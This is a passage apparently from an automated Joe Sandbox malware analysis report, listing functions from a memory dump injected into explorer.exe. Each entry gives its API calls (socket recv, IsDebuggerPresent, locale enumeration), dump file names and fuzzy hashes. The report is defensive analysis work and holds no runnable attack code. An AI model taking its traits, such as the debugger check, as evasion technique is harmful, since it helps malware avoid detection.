                                                  • Opcode Fuzzy Hash: a52e1c18a030e66389b6488386b7165f8401bc92a4955b877291cae89751846b
                                                  • Instruction Fuzzy Hash: AB619D71920317DBDB2CDF26DD81BAAB7A8EF04710F1845A9E905CA284E7B4E9D1CB50
                                                  Function 032127E0 Relevance: 4.6, APIs: 3, Instructions: 104networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • recv.WS2_32(?,?,00000004,00000000), ref: 0321282B
                                                  • recv.WS2_32(?,?,00000008,00000000), ref: 03212860
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: c0dc2f700e9a9836583710eeb03741a3bd492173d8c399004dca1839f3921d41
                                                  • Instruction ID: 81f1e846d6e50797a0ed4e114f6a06a923d172e8fcf5fa180c61ec2d17377244
                                                  • Opcode Fuzzy Hash: c0dc2f700e9a9836583710eeb03741a3bd492173d8c399004dca1839f3921d41
                                                  • Instruction Fuzzy Hash: BC31E4719102189FD720DB68ED85BABBBECEB0C724F144625F524E72C1DB74A8958BA0
                                                  Function 0322EE6D Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0322EF65
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0322EF6F
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0322EF7C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: e42c396d35bb3c5d293f48773053dede9a835ec8a619d7a37a32b65427d6e520
                                                  • Instruction ID: 71690d1c354a82c42ad9f52522718963c7e47218a1d95f5378f84095dbd05816
                                                  • Opcode Fuzzy Hash: e42c396d35bb3c5d293f48773053dede9a835ec8a619d7a37a32b65427d6e520
                                                  • Instruction Fuzzy Hash: 0131B374911329ABCF21DF68DC8879DBBB8BF18710F5041DAE40CA6250E7709BC18F45
                                                  Function 03232F20 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 268a6a1f54e59719a2cef1b62622025145d8953db70c9ce89e593b3ab586b678
                                                  • Instruction ID: 26e398d3913dd8296f740d6504e613fc0b1e12c8bc4f14b88e0e66e0c48c008a
                                                  • Opcode Fuzzy Hash: 268a6a1f54e59719a2cef1b62622025145d8953db70c9ce89e593b3ab586b678
                                                  • Instruction Fuzzy Hash: 99F13EB5E102199FDF14CFA8C8806AEFBB5FF49314F198269D919AB344D731AA41CB90
                                                  Function 0323C9DD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0323C9D8,?,?,00000008,?,?,032464A0,00000000), ref: 0323CC0A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 53437324f71bca9b4bc98fe44daca6186b84ad4d7fc5aa2645aea49a281bb2de
                                                  • Instruction ID: 50f92218ec488db029d507be38e195497a80d421eeea2c1e3275a6204f001f8e
                                                  • Opcode Fuzzy Hash: 53437324f71bca9b4bc98fe44daca6186b84ad4d7fc5aa2645aea49a281bb2de
                                                  • Instruction Fuzzy Hash: EFB16FB1620619CFD715CF28C486B65BBE1FF06364F198658E89ADF2A1C735E982CB40
                                                  Function 0322A68F Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0322A6A5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: 45aef4839921e8f0b17ae83d2d45f9e574ae66c15d3f4cd500dd24a2e7c28d12
                                                  • Instruction ID: 698295c60c89f067eacf2dfb125d51dd59709100c925edffc59d61e42998e4b9
                                                  • Opcode Fuzzy Hash: 45aef4839921e8f0b17ae83d2d45f9e574ae66c15d3f4cd500dd24a2e7c28d12
                                                  • Instruction Fuzzy Hash: 2D518CB1D106269BDB15CF59E8897AEBBF1FB48310F18C46AC805EB785D7749980CFA0
                                                  Function 0323F271 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae41b9410bf412790e2c7b4608d6f20600b185a4399bbd743c5455751ec880d8
                                                  • Instruction ID: 64c22640292da3bc94ca2a7dfbeb8dbf142865b608d6bde23bbfcc7cda47e6de
                                                  • Opcode Fuzzy Hash: ae41b9410bf412790e2c7b4608d6f20600b185a4399bbd743c5455751ec880d8
                                                  • Instruction Fuzzy Hash: DA41C2B9C14219AFDF20DF79DD88AAABBB9AF46200F1442DDE44DD7210DA349E858F50
                                                  Function 0324278C Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E32
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E68
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 032427E0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free$InfoLocale
                                                  • String ID:
                                                  • API String ID: 2003897158-0
                                                  • Opcode ID: 815eac5cf8d01f2a869ca76f75ef86b870bfae071775d19ee0e07de905a54173
                                                  • Instruction ID: c1432f1febf08a6defe61a919bab10986c49616aa80d0a6ecfa3185d31864f24
                                                  • Opcode Fuzzy Hash: 815eac5cf8d01f2a869ca76f75ef86b870bfae071775d19ee0e07de905a54173
                                                  • Instruction Fuzzy Hash: 4B218672520316EBDB2CDE16ED81E7E77ACEF45710F14447AF901DA140EBB4D980CA60
                                                  Function 03242413 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • EnumSystemLocalesW.KERNEL32(03242539,00000001,00000000,?,-00000050,?,03242B67,00000000,?,?,?,00000055,?), ref: 03242485
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: a87df1f101b382613047679929c93179232a34889875092a4ef29498292a376f
                                                  • Instruction ID: 6c5f15cf7e423df92e6b4276513da697b076266455273a4eed3335086028cc74
                                                  • Opcode Fuzzy Hash: a87df1f101b382613047679929c93179232a34889875092a4ef29498292a376f
                                                  • Instruction Fuzzy Hash: 39110C3B210705DFDB1CEF7AE8A167AB795FF80758B18882DE94687A40D371B582CB40
                                                  Function 032429B8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,03242755,00000000,00000000,?), ref: 032429E4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 26f07af0dabc7f1b4b0e74d5353b064c2f0b4f9fff5eabbfee8672b16bd36ea2
                                                  • Instruction ID: fb1dc31dda6910bfc1732a11ecc70fd506d06a4a77448da379715105bc49f01d
                                                  • Opcode Fuzzy Hash: 26f07af0dabc7f1b4b0e74d5353b064c2f0b4f9fff5eabbfee8672b16bd36ea2
                                                  • Instruction Fuzzy Hash: 6FF08636520326EBDB2DDA268845BBA7758DB40654F194C65EC06A7280EA74FA81C6E0
                                                  Function 03242321 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E32
                                                    • Part of subcall function 03236DD0: _free.LIBCMT ref: 03236E68
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 03242375
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast_free$InfoLocale
                                                  • String ID: utf8
                                                  • API String ID: 2003897158-905460609
                                                  • Opcode ID: 1a50219c45e0f86195c73e8324d3b86a91f41b297ed48a34680e68a7d2f69772
                                                  • Instruction ID: 1a792d372c46a47a1345883546235cae7b4e07f5cf5c93ffdd669779188ffe48
                                                  • Opcode Fuzzy Hash: 1a50219c45e0f86195c73e8324d3b86a91f41b297ed48a34680e68a7d2f69772
                                                  • Instruction Fuzzy Hash: B1F0A936620315A7C718FF25EC45EBE77ECDF45710F0540B9A502DB240EAB4AD458750
                                                  Function 032424AE Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • EnumSystemLocalesW.KERNEL32(0324278C,00000001,FFFFFFFF,?,-00000050,?,03242B2B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 032424F8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 40d4383fa741deeaab6a01f01166a2f2c9db120c130a6d65ababe22d6a5f9a62
                                                  • Instruction ID: 9f986493c96a2504ed5dc5dabf540b65b2c435ab0a501f47b767829dee62812a
                                                  • Opcode Fuzzy Hash: 40d4383fa741deeaab6a01f01166a2f2c9db120c130a6d65ababe22d6a5f9a62
                                                  • Instruction Fuzzy Hash: 5AF0FC363103059FDB1C9F3A9C85B7A7B95EF81768F09886DF9058B540C6B19981CB50
                                                  Function 032384BC Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 032326F0: EnterCriticalSection.KERNEL32(-000486C1,?,032339D5,00000000,03263F78,0000000C,0323399C,?,?,0323A7C3,?,?,03236F72,00000001,00000364,00000006), ref: 032326FF
                                                  • EnumSystemLocalesW.KERNEL32(032384AF,00000001,03264198,0000000C,032388DA,00000000), ref: 032384F4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 5ce8623959c4318732d5f07fc446e1751f04b42b7088777a76d72a303d10c316
                                                  • Instruction ID: 9e612e2d60be293dc54c5b3779401f8e23e0988d80e474ec89b18d2ff483e147
                                                  • Opcode Fuzzy Hash: 5ce8623959c4318732d5f07fc446e1751f04b42b7088777a76d72a303d10c316
                                                  • Instruction Fuzzy Hash: AEF0497AA60300EFDB04EF98E845B9D7BF0EF09B20F10805AE8109B291CBB599808F45
                                                  Function 032423C8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 03236DD0: GetLastError.KERNEL32(00000000,00000000,?,03237BB7,?,00000000,00000000,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010), ref: 03236DD5
                                                    • Part of subcall function 03236DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,03238071,00000000,00000000,00000000,00000000,8B18EC83,03264158,00000010,03231112,00000000,00000000,00000000), ref: 03236E73
                                                  • EnumSystemLocalesW.KERNEL32(03242321,00000001,FFFFFFFF,?,?,03242B89,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 032423FF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 3f8d002ae3a61e943820675aa568f98ec293ef3c92ebd9cff39c50b6a4e1e694
                                                  • Instruction ID: 171964581089636dfe45ac941cc1d714da111830d80d4a4e1fcb81f3c8677fde
                                                  • Opcode Fuzzy Hash: 3f8d002ae3a61e943820675aa568f98ec293ef3c92ebd9cff39c50b6a4e1e694
                                                  • Instruction Fuzzy Hash: 90F0EC3931030597CB08EF76E84576A7F54EFC2710F0A8499FE058B541D6B199C2C790
                                                  Function 032389DE Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,03235D32,?,20001004,00000000,00000002,?,?,0323533F), ref: 03238A12
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 17b755f098150e7da1aaeb93f7d3f2372f091ab0840c9ccf00ada5a9d59768c7
                                                  • Instruction ID: b99c411c8849bdf6fe444d8215cc4457af1a93119f6144be08a3974c8bba13c5
                                                  • Opcode Fuzzy Hash: 17b755f098150e7da1aaeb93f7d3f2372f091ab0840c9ccf00ada5a9d59768c7
                                                  • Instruction Fuzzy Hash: CCE04FB5550318BBCF12AF61EC08EAE7F26EF45761F058011FD056A224CBB29A619AD4
                                                  Function 0322A608 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002A614,0322A128), ref: 0322A60D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 29ecd257bbee86c1e82d0e3c01b760a569c6aea7d7459c0a6ed3a481d5d62e63
                                                  • Instruction ID: 022b74f6bc88c76c29945a9fedd049eba35f9afd214b0dffa5f159ab68cab228
                                                  • Opcode Fuzzy Hash: 29ecd257bbee86c1e82d0e3c01b760a569c6aea7d7459c0a6ed3a481d5d62e63
                                                  • Instruction Fuzzy Hash:
                                                  Function 0322F9DB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 03dd1183768d42172f3852db289e123a51c5fc8cfbb633d4bb9efddfa85f3345
                                                  • Instruction ID: 8189177c8760ff6c12e4b6634dd08dd43b5e7abd38305d088240273e6865eb5c
                                                  • Opcode Fuzzy Hash: 03dd1183768d42172f3852db289e123a51c5fc8cfbb633d4bb9efddfa85f3345
